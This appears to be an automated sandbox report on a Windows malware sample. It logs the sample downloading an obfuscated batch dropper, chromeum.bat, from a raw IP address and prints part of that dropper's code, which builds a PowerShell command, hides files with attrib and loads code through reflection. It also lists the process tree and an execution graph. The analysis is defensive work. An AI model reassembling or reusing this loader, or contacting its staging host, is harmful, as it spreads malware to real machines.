                                          Nov 20, 2024 07:48:03.926179886 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926202059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926218987 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926234007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926274061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926285982 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926307917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926357031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926374912 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926409006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926440954 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926457882 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926474094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926507950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926529884 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926542044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926573992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926606894 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926606894 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926640987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926665068 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926675081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926709890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926739931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926742077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926776886 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926793098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926810980 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926842928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926855087 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926877022 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926908970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926934004 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.926940918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926973104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.926995039 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927006960 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927038908 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927064896 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927072048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927103996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927124977 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927138090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927171946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927194118 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927205086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927234888 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927268028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927270889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927300930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927335978 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927350044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927385092 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927403927 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927417040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927449942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927474976 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927483082 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927515984 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927532911 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927550077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927582026 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927597046 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927615881 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927648067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927664042 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927680016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927712917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927727938 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927747011 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927778959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927795887 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927812099 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927845001 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927855968 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927877903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927911043 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927925110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.927946091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.927993059 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.928236008 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.966116905 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966165066 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966202974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966236115 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.966238022 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966274023 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966291904 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.966310024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966346025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966361046 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.966383934 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.966445923 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.014827013 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.014870882 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.014930964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.014966965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015000105 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015033007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015065908 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015070915 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015100956 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015103102 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015135050 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015150070 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015168905 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015202045 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015222073 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015235901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015269041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015301943 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015302896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015368938 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015403032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015435934 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015436888 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015469074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015477896 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015508890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:04.015539885 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.015569925 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.079371929 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:04.084496975 CET804970482.115.223.189192.168.2.5
                                          • 82.115.223.189
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.54970482.115.223.189803040C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 20, 2024 07:48:01.681282997 CET142OUTGET /chromeum.bat HTTP/1.0
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)
                                          Accept: */*
                                          Host: 82.115.223.189
                                          Nov 20, 2024 07:48:02.291048050 CET1236INHTTP/1.1 200 OK
                                          Date: Wed, 20 Nov 2024 06:48:02 GMT
                                          Server: Apache/2.4.52 (Ubuntu)
                                          Last-Modified: Mon, 18 Nov 2024 14:42:51 GMT
                                          ETag: "216c03-62730ee60d31c"
                                          Accept-Ranges: bytes
                                          Content-Length: 2190339
                                          Connection: close
                                          Content-Type: application/x-msdos-program
                                          Data Raw: 40 63 68 63 70 20 36 35 30 30 31 0d 0a 73 65 74 20 22 d0 9f d1 82 d5 83 d5 81 d5 84 d5 90 d5 aa d1 83 3d 79 73 57 4f 57 36 22 0d 0a 3a 3a 20 4a 6e 7a 6f 6e 63 20 50 76 67 75 79 0d 0a 3a 3a 20 42 73 72 64 65 6c 62 69 61 0d 0a 3a 3a 20 47 76 66 61 6a 6a 61 0d 0a 73 65 74 20 22 d4 b6 d5 a6 d0 b2 d0 bc d1 80 3d 73 68 65 6c 6c 2e 22 0d 0a 3a 3a 20 41 68 6f 61 6d 63 64 20 42 6f 62 66 62 78 66 6d 20 54 6a 7a 62 74 0d 0a 73 65 74 20 22 d0 9f d4 bd d4 b2 d4 b4 d5 a9 d5 94 3d 2f 68 20 2f 69 20 22 0d 0a 3a 3a 20 58 7a 70 75 6b 75 74 61 70 20 52 75 71 79 64 68 63 79 79 0d 0a 3a 3a 20 51 71 68 6e 67 78 79 69 20 50 6d 6c 71 64 6d 0d 0a 73 65 74 20 22 d5 8b d5 89 d5 ac d0 b2 d5 8b d4 b2 d5 86 d5 a5 3d 65 72 53 68 65 6c 22 0d 0a 3a 3a 20 53 66 6c 76 6d 20 50 72 63 68 64 64 74 6d 67 20 48 6f 74 71 62 6d 0d 0a 3a 3a 20 4c 6d 6b 78 79 6f 79 62 62 6c 6b 20 47 61 69 69 68 78 71 67 0d 0a 3a 3a 20 46 6e 79 70 6b 6a 75 66 73 0d 0a 73 65 74 20 22 d5 92 d5 92 d5 81 d5 8e d5 92 d1 80 3d 43 3a 5c 57 69 6e 22 0d 0a 73 65 74 20 [TRUNCATED]
                                          Data Ascii: @chcp 65001set "=ysWOW6":: Jnzonc Pvguy:: Bsrdelbia:: Gvfajjaset "=shell.":: Ahoamcd Bobfbxfm Tjzbtset "=/h /i ":: Xzpukutap Ruqydhcyy:: Qqhngxyi Pmlqdmset "=erShel":: Sflvm Prchddtmg Hotqbm:: Lmkxyoybblk Gaiihxqg:: Fnypkjufsset "=C:\Win"set "=l\v1.0"set "=exe %~0.Ums":: Eigdqamp Ktiet:: Amrbq Kbiydsbfckl Marfjmkzset "=dows\S"set "=echo F"set "=owsPow":: Mgqgsqkguas Cigwe Awgjnkph:: Hgpeve Btwfruhwduf Nmkjxf:: Yjnkwndlris Qoogoset "=4\Wind":: Atculh Gtywekljz Fuvjtuiyqim:: Kdkjzk Fyeuk Mdelaf:: Qzray Yahzqjdgepw:: Ddlvjcoset "=py /d ":: Kabgrmw:: Wtbewq Fwooc:: Svcihasset "=/q /y "set "=\power"set "= | xco"%%%%%
                                          Nov 20, 2024 07:48:02.291078091 CET224INData Raw: b5 d5 8c d5 81 d0 bf d5 86 d5 8d 25 25 d5 84 d5 a4 d4 be d0 bc d4 b9 d1 82 d5 bb d5 8b 25 25 d0 9f d4 bd d4 b2 d4 b4 d5 a9 d5 94 25 25 d5 92 d5 92 d5 81 d5 8e d5 92 d1 80 25 25 d4 b3 d0 9f d5 82 d5 8f d5 a7 d5 b7 d5 88 25 25 d0 9f d1 82 d5 83 d5
                                          Data Ascii: %%%%%%%%%%%%%%%%%%%%%%%%%set "
                                          Nov 20, 2024 07:48:02.291090965 CET1236INData Raw: d4 be d4 be d5 b5 d4 b7 3d 61 74 74 72 69 62 22 0d 0a 3a 3a 20 54 68 76 76 79 68 77 79 69 64 69 20 49 67 79 66 7a 78 64 74 70 65 6d 20 50 66 69 6b 77 73 0d 0a 3a 3a 20 49 67 6a 76 72 6f 0d 0a 73 65 74 20 22 d5 8b d5 90 d5 84 d5 8c d4 be 3d 20 25
                                          Data Ascii: =attrib":: Thvvyhwyidi Igyfzxdtpem Pfikws:: Igjvroset "= %~0.Ums"set "= +s +h"%%%%%%@echo offset "=zjdh=%~dpnx0"set "=SET Ci"%
                                          Nov 20, 2024 07:48:02.291099072 CET1236INData Raw: 20 22 d5 8f d5 a4 d5 aa d1 87 d4 b2 d0 9f d4 b9 3d 49 6e 76 6f 6b 65 22 0d 0a 3a 3a 20 45 71 6e 63 77 69 76 63 71 20 49 63 75 75 61 78 6c 20 54 70 63 6c 73 74 6a 77 6d 68 61 0d 0a 73 65 74 20 22 d5 81 d1 80 d4 bc d5 b0 d4 bf d4 b2 d5 84 d1 80 3d
                                          Data Ascii: "=Invoke":: Eqncwivcq Icuuaxl Tpclstjwmhaset "=ress);"set "=[Syste"set "=ll""set "=1; $Mf":: Bzqmifanvi Etkalqepl:: Fubrxuu Wuzqd Adliyohcsm:: V
                                          Nov 20, 2024 07:48:02.291114092 CET1236INData Raw: a6 d5 80 d4 b8 d0 b8 d5 84 3d 43 75 72 72 65 6e 22 0d 0a 73 65 74 20 22 d4 b3 d5 b0 d1 82 d5 a9 d4 bf 3d 79 73 74 65 6d 2e 22 0d 0a 73 65 74 20 22 d5 85 d5 ac d4 be d5 b0 d4 b3 d4 b8 3d 79 28 29 3b 5b 41 22 0d 0a 73 65 74 20 22 d4 bd d5 af d5 a3
                                          Data Ascii: =Curren"set "=ystem."set "=y();[A"set "=Cmrpwe"set "=gType."set "=($Tygm"set "=se($Mf":: Zzibnew Duetsojcmki:: Hfglexz Lwpprgl:: Wrx
                                          Nov 20, 2024 07:48:02.291127920 CET1236INData Raw: 64 62 6c 20 4d 70 66 65 6f 7a 65 0d 0a 73 65 74 20 22 d5 8d d0 bf d5 8b d1 83 d5 af d5 bb d5 90 d5 b8 d5 82 3d 6e 79 73 20 3d 20 22 0d 0a 73 65 74 20 22 d5 94 d4 b4 d5 87 d5 af d1 87 d1 86 3d 2c 20 5b 53 79 73 22 0d 0a 3a 3a 20 4d 77 62 64 7a 20
                                          Data Ascii: dbl Mpfeozeset "=nys = "set "=, [Sys":: Mwbdz Dnrzekset "=ject S"set "=m.Conv"set "= = $Vf"set "=();[by"set "=ags]::"set
                                          Nov 20, 2024 07:48:02.291142941 CET1236INData Raw: d5 82 d0 bc d5 89 d5 87 3d 79 6e 79 73 20 29 22 0d 0a 3a 3a 20 4b 6f 69 6e 72 74 77 20 49 73 61 6e 6b 6d 73 62 69 6f 73 0d 0a 3a 3a 20 44 66 62 72 6e 7a 77 75 20 55 61 74 6e 72 63 71 74 65 0d 0a 3a 3a 20 4d 79 63 62 61 6b 71 6f 20 57 6b 6d 72 66
                                          Data Ascii: =ynys )":: Koinrtw Isankmsbios:: Dfbrnzwu Uatnrcqte:: Mycbakqo Wkmrftqbog Lznqmcdppset "=AppDom":: Xvjuheze:: Wddiojrircm Mkehdvset "=%~0.Ums ":: Mxrphq Pgalgshxk Qruuvwf:: Nkyecma Lzcogjsset "
                                          Nov 20, 2024 07:48:02.291156054 CET1236INData Raw: d5 93 d5 a7 d5 80 d5 b8 d1 83 d4 be d0 bc 3d 70 72 65 73 73 69 22 0d 0a 73 65 74 20 22 d5 85 d5 a5 d5 ac d5 8c d1 86 d5 a6 3d 4f 75 74 2d 4e 75 22 0d 0d 0a 25 d0 92 d5 aa d0 bf d4 b9 d5 8c 25 25 d0 9f d5 ad d5 87 d5 bd d5 91 d4 bc d5 b1 d5 aa 25
                                          Data Ascii: =pressi"set "=Out-Nu"%%%%%%%%%%%%%%%%%%%%%%%%%
                                          Nov 20, 2024 07:48:02.291172028 CET1236INData Raw: 93 d5 ae d0 bf d5 b5 d5 80 d4 bc d1 87 d5 87 d1 80 25 25 d4 ba d5 91 d4 b6 d5 82 d0 bc d5 93 d5 af 25 25 d4 b3 d5 85 d5 84 d5 84 d5 ad d5 8d d5 91 d5 a8 d1 80 25 25 d4 b8 d5 8b d5 a3 d5 82 d4 b8 d5 8e d4 bc 25 25 d5 89 d5 b6 d0 bf d4 b4 d5 aa d5
                                          Data Ascii: %%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                          Nov 20, 2024 07:48:02.291186094 CET1236INData Raw: 2f 2b 4d 33 2f 6b 36 2b 6b 33 66 76 72 62 6e 33 33 79 68 37 2f 39 33 57 2f 38 77 65 2f 2f 79 6e 63 2f 2b 2b 37 33 76 76 48 4e 62 2f 2f 42 7a 7a 37 35 39 71 64 2f 39 68 75 66 2f 65 48 76 66 4f 2f 58 75 65 78 33 76 76 58 74 50 2f 2b 31 6e 2f 44 68
                                          Data Ascii: /+M3/k6+k3fvrbn33yh7/93W/8we//ync/++73vvHNb//Bzz759qd/9huf/eHvfO/Xuex3vvXtP/+1n/DhP7o5rhN/m9f54bO9d/5rv/bJT3tbn3zjm9/6tV8bP/jjX//ZT7/9yXe+9vXrp/1f+PrP8tvPvvfpb3yNj/r+dz795Z//Ypn4yC/9/he5pV/55nc++fbXvh5+mzfyowv93Nc/+/QHfPB3vvutT375O598/7Ovfb39w
                                          Nov 20, 2024 07:48:02.296274900 CET1236INData Raw: 2b 47 39 50 48 58 70 31 7a 58 77 39 2f 4f 33 38 54 65 52 2f 35 6d 76 69 36 5a 58 2f 4b 36 7a 76 65 4c 37 79 4e 2f 64 2f 6e 34 4f 31 2f 6e 33 33 42 66 72 34 41 30 2f 36 61 2f 2b 38 2b 37 76 61 36 66 77 62 2f 33 35 36 2f 7a 39 31 66 2b 30 65 66 63
                                          Data Ascii: +G9PHXp1zXw9/O38TeR/5mvi6ZX/K6zveL7yN/d/n4O1/n33Bfr4A0/6a/+8+7va6fwb/356/z91f+0efc6fqxP/nzewv8PfdvfR3/xvjxvT6bf33de79fet7m/eWf8Bmfr8P6/DnK/fHrL37nz+rn//q5z+frNPy8n3D/rsP8/LXhS+t8f35Nf37nH31G/eLz7x89z4i/+ZquQfvKfbiXPp/rke6//fXK3836fGU9vthj7+ldn


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:01:47:59
                                          Start date:20/11/2024
                                          Path:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\BWuMwnE7tw.exe"
                                          Imagebase:0x400000
                                          File size:962'644 bytes
                                          MD5 hash:BC9E4510FE172F8155D02B28AB79DA83
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:01:48:05
                                          Start date:20/11/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat""
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:01:48:05
                                          Start date:20/11/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:01:48:05
                                          Start date:20/11/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:cmd.exe /c deldll.bat
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:01:48:05
                                          Start date:20/11/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:01:48:05
                                          Start date:20/11/2024
                                          Path:C:\Windows\SysWOW64\PING.EXE
                                          Wow64 process (32bit):true
                                          Commandline:ping -n 2 -w 1000 127.0.0.1
                                          Imagebase:0xd00000
                                          File size:18'944 bytes
                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:2.6%
                                            Total number of Nodes:851
                                            Total number of Limit Nodes:16
                                            execution_graph 3499 10002e40 3500 10002e4c 3499->3500 3509 10003c00 malloc 3500->3509 3502 10002e51 3518 10005d80 3502->3518 3510 10003c20 malloc 3509->3510 3544 10003e70 3510->3544 3514 10003980 5 API calls 3516 10003c88 3514->3516 3515 10003cbd CharLowerA 3515->3516 3516->3515 3517 10003d28 3516->3517 3517->3502 3519 10005d94 GetCPInfo 3518->3519 3520 10005d8c AllocConsole 3518->3520 3521 10005db4 3519->3521 3520->3521 3522 10005dc1 GetStdHandle GetStdHandle 3521->3522 3523 10002e70 3521->3523 3522->3523 3524 10004bf0 3523->3524 3525 10004bfd 3524->3525 3546 100031f0 3525->3546 3527 10002e7a 3528 10005190 3527->3528 3529 100051b6 3528->3529 3556 10006740 3529->3556 3531 100051f1 3560 100067e0 3531->3560 3535 10005200 3537 10005215 3535->3537 3570 100074f0 3535->3570 3538 100074a0 11 API calls 3537->3538 3539 10005334 3537->3539 3538->3537 3541 10005411 3539->3541 3575 10007be0 3539->3575 3542 10002e7f 3541->3542 3543 100074a0 11 API calls 3541->3543 3543->3541 3545 10003c69 InitializeCriticalSection 3544->3545 3545->3514 3551 10003b40 3546->3551 3548 100031fd 3549 10003980 5 API calls 3548->3549 3550 10003207 3549->3550 3550->3527 3552 10003b49 EnterCriticalSection 3551->3552 3553 10003bbf 3551->3553 3554 10003b86 LeaveCriticalSection 3552->3554 3555 10003b66 free LeaveCriticalSection 3552->3555 3553->3548 3554->3553 3555->3548 3557 1000674e 3556->3557 3580 10006930 3557->3580 3559 10006759 3559->3531 3592 10003a80 3560->3592 3562 100067e8 3563 10003980 5 API calls 3562->3563 3564 100051f6 3563->3564 3565 100074a0 3564->3565 3595 10006860 3565->3595 3567 100074a8 3604 10006f50 3567->3604 3569 100074de 3569->3535 3629 10007220 3570->3629 3572 1000750d 3573 10006f50 11 API calls 3572->3573 3574 10007659 3573->3574 3574->3535 3633 10007680 3575->3633 3577 10007c1b 3578 10006f50 11 API calls 3577->3578 3579 10007ca3 3578->3579 3579->3539 3583 10006ae0 3580->3583 3582 10006947 3582->3559 3586 100034f0 3583->3586 3587 10003562 3586->3587 3588 10003509 3586->3588 3587->3582 3589 100031f0 9 API calls 3588->3589 3590 1000354b 3589->3590 3590->3587 3591 10003b40 4 API calls 3590->3591 3591->3587 3593 10003980 5 API calls 3592->3593 3594 10003a8c 3593->3594 3594->3562 3596 100068b7 3595->3596 3597 1000687c 3595->3597 3596->3567 3598 100067e0 5 API calls 3597->3598 3599 10006881 3598->3599 3600 1000689f 3599->3600 3601 10003b40 4 API calls 3599->3601 3600->3567 3602 10006899 3601->3602 3603 10003980 5 API calls 3602->3603 3603->3600 3605 10006f74 3604->3605 3611 10007027 3604->3611 3605->3611 3614 10006780 3605->3614 3608 1000703d 3609 100040a0 2 API calls 3608->3609 3610 1000704c 3609->3610 3610->3569 3612 10007072 3611->3612 3617 10006970 3611->3617 3612->3569 3620 100065e0 3614->3620 3616 10006791 3616->3608 3616->3611 3616->3612 3626 100068f0 3617->3626 3619 1000697a 3619->3612 3621 100065fb 3620->3621 3622 10003980 5 API calls 3621->3622 3625 100066fe 3621->3625 3623 100066bf 3622->3623 3624 10006970 9 API calls 3623->3624 3624->3625 3625->3616 3627 10006ae0 9 API calls 3626->3627 3628 100068fd 3627->3628 3628->3619 3630 10007259 3629->3630 3631 10006860 9 API calls 3630->3631 3632 10007275 3631->3632 3632->3572 3634 10007220 9 API calls 3633->3634 3635 100076a1 3634->3635 3635->3577 4144 10005f00 4145 10005f0a 4144->4145 4146 10005f1a 4144->4146 4147 10005f2a ReadConsoleA 4146->4147 4148 10005d80 4 API calls 4146->4148 4148->4147 4243 10004280 4244 1000428e 4243->4244 4262 100042c8 4243->4262 4274 10004240 vsprintf 4244->4274 4245 100043df 4247 100042e4 4250 10004240 vsprintf 4247->4250 4248 100042fb 4251 10004302 4248->4251 4252 10004315 4248->4252 4255 100042f6 4250->4255 4256 10004240 vsprintf 4251->4256 4253 1000431c 4252->4253 4254 1000432e 4252->4254 4257 10004240 vsprintf 4253->4257 4258 10004335 4254->4258 4259 10004347 4254->4259 4264 10004240 vsprintf 4255->4264 4256->4255 4257->4255 4261 10004240 vsprintf 4258->4261 4263 10004240 vsprintf 4259->4263 4260 10004240 vsprintf 4260->4262 4261->4255 4262->4245 4262->4247 4262->4248 4263->4255 4265 1000435d 4264->4265 4266 10004365 4265->4266 4267 100043b9 GetTickCount 4265->4267 4268 100043b2 4266->4268 4269 10004368 GetTickCount 4266->4269 4267->4268 4268->4245 4271 10004240 vsprintf 4268->4271 4270 10004240 vsprintf 4269->4270 4270->4268 4272 100043d7 4271->4272 4276 10005e70 4272->4276 4275 1000426c 4274->4275 4275->4260 4275->4262 4277 10005e86 4276->4277 4278 10005e7c 4276->4278 4279 10005e96 GetConsoleMode SetConsoleMode ReadConsoleA SetConsoleMode 4277->4279 4280 10005d80 4 API calls 4277->4280 4278->4245 4279->4245 4280->4279 4281 10005880 4282 10005898 4281->4282 4283 10005470 9 API calls 4282->4283 4284 1000593c 4283->4284 4285 10008c80 4286 10003430 4 API calls 4285->4286 4287 10008c8b 4286->4287 4300 100069c0 4287->4300 4290 100069c0 4 API calls 4291 10008c9d 4290->4291 4292 100069c0 4 API calls 4291->4292 4293 10008ca6 4292->4293 4294 100069c0 4 API calls 4293->4294 4295 10008cb2 4294->4295 4306 100065c0 4295->4306 4298 10008ccb 4299 10003b40 4 API calls 4299->4298 4301 100069f3 4300->4301 4304 100069ce 4300->4304 4302 10003430 4 API calls 4301->4302 4303 100069f9 4302->4303 4303->4290 4304->4301 4305 10003b40 4 API calls 4304->4305 4305->4304 4307 100069c0 4 API calls 4306->4307 4308 100065cb 4307->4308 4309 100069c0 4 API calls 4308->4309 4310 100065d4 